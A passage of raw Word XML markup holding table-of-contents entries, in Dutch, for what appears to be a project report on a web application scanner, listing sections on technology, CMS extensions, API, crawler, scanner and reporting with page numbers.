              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022074 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C639148" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022075" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5 Technologie</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022075 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62C922B0" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022076" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.1 Web Application Framework</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022076 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5944A83B" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022077" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.2 Database</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022077 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39F6C7A9" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022078" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4 Concept ontwikkeling</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022078 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B566B45" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022079" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1 Concept van het system</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022079 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D5E1DD7" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022080" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2 CMS extensies</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022080 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2EABB0E6" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022081" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3 API</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022081 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BAE41B2" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022082" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4 Web Applicatie Scanner</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022082 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="371B10D9" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022083" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.1 Command Line Interface</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022083 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24621DBD" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022084" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.2 Crawler</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022084 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>67</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="631BAB62" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022085" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.3 Scanner</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022085 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>72</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="378AB2A2" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022086" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.4 Rapporteren</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022086 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>77</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5EF3B722" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022087" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5 Systeem en Software architectuur</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022087 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46C57BBA" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022088" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1 Het systeem</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022088 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21286963" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022089" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1.2 Systeem context</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022089 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="265FB423" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022090" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1.2 Systeem Use Case</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc491022090 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>84</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="408E6CE5" w14:textId="77777777" w:rsidR="00A27982" w:rsidRDefault="00A27982">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc491022091" w:history="1">
            <w:r w:rsidRPr="00C57919">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1.3 Usecase</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
